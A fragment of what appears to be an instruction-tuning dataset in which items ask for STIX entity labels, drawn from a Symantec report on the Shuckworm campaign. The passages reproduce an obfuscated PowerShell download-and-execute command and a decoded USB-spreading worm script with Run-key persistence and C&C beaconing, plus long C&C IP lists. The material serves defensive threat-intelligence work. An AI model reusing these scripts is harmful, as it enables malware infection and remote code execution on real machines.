"input": "### Entity:\ncmd.exe\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\ndeprive.wow\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n89.185.84.50\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n139.59.60.191\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n167.99.215.50\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- 